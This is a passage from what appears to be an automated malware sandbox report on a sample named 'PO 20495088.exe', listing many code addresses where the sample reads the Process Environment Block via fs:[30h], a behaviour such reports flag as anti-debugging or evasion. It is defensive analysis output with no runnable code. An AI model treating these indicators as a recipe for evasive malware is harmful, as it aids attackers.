                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A63C0 mov eax, dword ptr fs:[00000030h]6_2_017A63C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718397 mov eax, dword ptr fs:[00000030h]6_2_01718397
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718397 mov eax, dword ptr fs:[00000030h]6_2_01718397
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718397 mov eax, dword ptr fs:[00000030h]6_2_01718397
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E388 mov eax, dword ptr fs:[00000030h]6_2_0171E388
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E388 mov eax, dword ptr fs:[00000030h]6_2_0171E388
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E388 mov eax, dword ptr fs:[00000030h]6_2_0171E388
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174438F mov eax, dword ptr fs:[00000030h]6_2_0174438F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174438F mov eax, dword ptr fs:[00000030h]6_2_0174438F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724260 mov eax, dword ptr fs:[00000030h]6_2_01724260
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724260 mov eax, dword ptr fs:[00000030h]6_2_01724260
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724260 mov eax, dword ptr fs:[00000030h]6_2_01724260
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171826B mov eax, dword ptr fs:[00000030h]6_2_0171826B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171A250 mov eax, dword ptr fs:[00000030h]6_2_0171A250
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726259 mov eax, dword ptr fs:[00000030h]6_2_01726259
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA250 mov eax, dword ptr fs:[00000030h]6_2_017DA250
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA250 mov eax, dword ptr fs:[00000030h]6_2_017DA250
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A8243 mov eax, dword ptr fs:[00000030h]6_2_017A8243
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A8243 mov ecx, dword ptr fs:[00000030h]6_2_017A8243
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171823B mov eax, dword ptr fs:[00000030h]6_2_0171823B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302E1 mov eax, dword ptr fs:[00000030h]6_2_017302E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302E1 mov eax, dword ptr fs:[00000030h]6_2_017302E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302E1 mov eax, dword ptr fs:[00000030h]6_2_017302E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302A0 mov eax, dword ptr fs:[00000030h]6_2_017302A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302A0 mov eax, dword ptr fs:[00000030h]6_2_017302A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov ecx, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E284 mov eax, dword ptr fs:[00000030h]6_2_0175E284
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E284 mov eax, dword ptr fs:[00000030h]6_2_0175E284
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A0283 mov eax, dword ptr fs:[00000030h]6_2_017A0283
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A0283 mov eax, dword ptr fs:[00000030h]6_2_017A0283
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A0283 mov eax, dword ptr fs:[00000030h]6_2_017A0283
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175656A mov eax, dword ptr fs:[00000030h]6_2_0175656A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175656A mov eax, dword ptr fs:[00000030h]6_2_0175656A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175656A mov eax, dword ptr fs:[00000030h]6_2_0175656A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728550 mov eax, dword ptr fs:[00000030h]6_2_01728550
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728550 mov eax, dword ptr fs:[00000030h]6_2_01728550
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B6500 mov eax, dword ptr fs:[00000030h]6_2_017B6500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017225E0 mov eax, dword ptr fs:[00000030h]6_2_017225E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C5ED mov eax, dword ptr fs:[00000030h]6_2_0175C5ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C5ED mov eax, dword ptr fs:[00000030h]6_2_0175C5ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017265D0 mov eax, dword ptr fs:[00000030h]6_2_017265D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A5D0 mov eax, dword ptr fs:[00000030h]6_2_0175A5D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A5D0 mov eax, dword ptr fs:[00000030h]6_2_0175A5D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E5CF mov eax, dword ptr fs:[00000030h]6_2_0175E5CF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E5CF mov eax, dword ptr fs:[00000030h]6_2_0175E5CF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017445B1 mov eax, dword ptr fs:[00000030h]6_2_017445B1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017445B1 mov eax, dword ptr fs:[00000030h]6_2_017445B1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A05A7 mov eax, dword ptr fs:[00000030h]6_2_017A05A7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A05A7 mov eax, dword ptr fs:[00000030h]6_2_017A05A7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A05A7 mov eax, dword ptr fs:[00000030h]6_2_017A05A7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E59C mov eax, dword ptr fs:[00000030h]6_2_0175E59C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01722582 mov eax, dword ptr fs:[00000030h]6_2_01722582
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01722582 mov ecx, dword ptr fs:[00000030h]6_2_01722582
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01754588 mov eax, dword ptr fs:[00000030h]6_2_01754588
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174A470 mov eax, dword ptr fs:[00000030h]6_2_0174A470
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174A470 mov eax, dword ptr fs:[00000030h]6_2_0174A470
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174A470 mov eax, dword ptr fs:[00000030h]6_2_0174A470
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AC460 mov ecx, dword ptr fs:[00000030h]6_2_017AC460
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA456 mov eax, dword ptr fs:[00000030h]6_2_017DA456
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171645D mov eax, dword ptr fs:[00000030h]6_2_0171645D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174245A mov eax, dword ptr fs:[00000030h]6_2_0174245A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A430 mov eax, dword ptr fs:[00000030h]6_2_0175A430
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E420 mov eax, dword ptr fs:[00000030h]6_2_0171E420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E420 mov eax, dword ptr fs:[00000030h]6_2_0171E420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E420 mov eax, dword ptr fs:[00000030h]6_2_0171E420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171C427 mov eax, dword ptr fs:[00000030h]6_2_0171C427
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758402 mov eax, dword ptr fs:[00000030h]6_2_01758402
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758402 mov eax, dword ptr fs:[00000030h]6_2_01758402
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758402 mov eax, dword ptr fs:[00000030h]6_2_01758402
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017204E5 mov ecx, dword ptr fs:[00000030h]6_2_017204E5
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017544B0 mov ecx, dword ptr fs:[00000030h]6_2_017544B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AA4B0 mov eax, dword ptr fs:[00000030h]6_2_017AA4B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017264AB mov eax, dword ptr fs:[00000030h]6_2_017264AB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA49A mov eax, dword ptr fs:[00000030h]6_2_017DA49A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728770 mov eax, dword ptr fs:[00000030h]6_2_01728770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720750 mov eax, dword ptr fs:[00000030h]6_2_01720750
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762750 mov eax, dword ptr fs:[00000030h]6_2_01762750
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762750 mov eax, dword ptr fs:[00000030h]6_2_01762750
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AE75D mov eax, dword ptr fs:[00000030h]6_2_017AE75D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A4755 mov eax, dword ptr fs:[00000030h]6_2_017A4755
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175674D mov esi, dword ptr fs:[00000030h]6_2_0175674D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175674D mov eax, dword ptr fs:[00000030h]6_2_0175674D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175674D mov eax, dword ptr fs:[00000030h]6_2_0175674D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175273C mov eax, dword ptr fs:[00000030h]6_2_0175273C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175273C mov ecx, dword ptr fs:[00000030h]6_2_0175273C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175273C mov eax, dword ptr fs:[00000030h]6_2_0175273C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179C730 mov eax, dword ptr fs:[00000030h]6_2_0179C730
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C720 mov eax, dword ptr fs:[00000030h]6_2_0175C720
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C720 mov eax, dword ptr fs:[00000030h]6_2_0175C720
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720710 mov eax, dword ptr fs:[00000030h]6_2_01720710
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01750710 mov eax, dword ptr fs:[00000030h]6_2_01750710
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C700 mov eax, dword ptr fs:[00000030h]6_2_0175C700
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017247FB mov eax, dword ptr fs:[00000030h]6_2_017247FB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017247FB mov eax, dword ptr fs:[00000030h]6_2_017247FB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017427ED mov eax, dword ptr fs:[00000030h]6_2_017427ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017427ED mov eax, dword ptr fs:[00000030h]6_2_017427ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017427ED mov eax, dword ptr fs:[00000030h]6_2_017427ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AE7E1 mov eax, dword ptr fs:[00000030h]6_2_017AE7E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172C7C0 mov eax, dword ptr fs:[00000030h]6_2_0172C7C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A07C3 mov eax, dword ptr fs:[00000030h]6_2_017A07C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017207AF mov eax, dword ptr fs:[00000030h]6_2_017207AF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D47A0 mov eax, dword ptr fs:[00000030h]6_2_017D47A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C678E mov eax, dword ptr fs:[00000030h]6_2_017C678E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01752674 mov eax, dword ptr fs:[00000030h]6_2_01752674
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E866E mov eax, dword ptr fs:[00000030h]6_2_017E866E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E866E mov eax, dword ptr fs:[00000030h]6_2_017E866E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A660 mov eax, dword ptr fs:[00000030h]6_2_0175A660
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A660 mov eax, dword ptr fs:[00000030h]6_2_0175A660
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173C640 mov eax, dword ptr fs:[00000030h]6_2_0173C640
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E627 mov eax, dword ptr fs:[00000030h]6_2_0173E627
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01756620 mov eax, dword ptr fs:[00000030h]6_2_01756620
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758620 mov eax, dword ptr fs:[00000030h]6_2_01758620
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172262C mov eax, dword ptr fs:[00000030h]6_2_0172262C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762619 mov eax, dword ptr fs:[00000030h]6_2_01762619
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E609 mov eax, dword ptr fs:[00000030h]6_2_0179E609
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E6F2 mov eax, dword ptr fs:[00000030h]6_2_0179E6F2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E6F2 mov eax, dword ptr fs:[00000030h]6_2_0179E6F2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E6F2 mov eax, dword ptr fs:[00000030h]6_2_0179E6F2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E6F2 mov eax, dword ptr fs:[00000030h]6_2_0179E6F2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A06F1 mov eax, dword ptr fs:[00000030h]6_2_017A06F1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A06F1 mov eax, dword ptr fs:[00000030h]6_2_017A06F1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0175A6C7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A6C7 mov eax, dword ptr fs:[00000030h]6_2_0175A6C7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017566B0 mov eax, dword ptr fs:[00000030h]6_2_017566B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C6A6 mov eax, dword ptr fs:[00000030h]6_2_0175C6A6
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724690 mov eax, dword ptr fs:[00000030h]6_2_01724690
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724690 mov eax, dword ptr fs:[00000030h]6_2_01724690
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C4978 mov eax, dword ptr fs:[00000030h]6_2_017C4978
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C4978 mov eax, dword ptr fs:[00000030h]6_2_017C4978
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AC97C mov eax, dword ptr fs:[00000030h]6_2_017AC97C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01746962 mov eax, dword ptr fs:[00000030h]6_2_01746962
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01746962 mov eax, dword ptr fs:[00000030h]6_2_01746962
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01746962 mov eax, dword ptr fs:[00000030h]6_2_01746962
